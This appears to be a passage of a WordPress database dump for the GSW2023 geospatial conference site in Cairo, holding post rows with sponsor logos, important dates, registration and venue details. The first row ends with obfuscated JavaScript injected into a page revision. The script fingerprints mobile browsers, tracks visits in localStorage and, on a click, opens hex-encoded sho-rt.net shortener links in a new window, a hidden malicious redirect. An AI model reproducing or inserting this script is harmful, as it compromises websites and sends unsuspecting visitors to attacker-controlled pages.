_0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 02:07:52','2023-05-16 02:07:52','',3066,'https://gsw2023.com/?p=4499',0,'revision','',0),
(4500,1,'2023-05-16 21:16:12','2023-05-16 21:16:12','','Print','','inherit','open','closed','','print','','','2023-05-16 21:16:12','2023-05-16 21:16:12','',3066,'https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO.jpg',0,'attachment','image/jpeg',0),
(4501,1,'2023-05-16 21:20:48','2023-05-16 21:20:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" 